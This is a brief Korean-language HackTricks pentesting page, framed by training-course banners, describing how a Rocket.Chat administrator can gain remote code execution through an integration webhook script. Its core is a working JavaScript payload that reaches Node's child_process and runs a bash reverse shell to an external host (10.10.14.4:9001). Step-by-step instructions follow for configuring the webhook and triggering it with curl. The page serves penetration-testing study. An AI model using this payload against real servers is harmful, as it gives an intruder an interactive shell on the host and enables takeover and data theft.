로켓 챗

Reading time: 2 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

RCE

로켓 챗에서 관리자인 경우 RCE를 얻을 수 있습니다.

  • **Integrations**로 가서 **New Integration**을 선택하고 Incoming WebHook 또는 Outgoing WebHook 중 하나를 선택합니다.
  • /admin/integrations/incoming
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • WebHook을 구성합니다 (채널과 사용자 이름으로 게시물이 존재해야 합니다):
  • WebHook 스크립트를 구성합니다:
  • 변경 사항 저장
  • 생성된 WebHook URL을 가져옵니다:
  • curl로 호출하면 rev shell을 받을 수 있습니다.

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기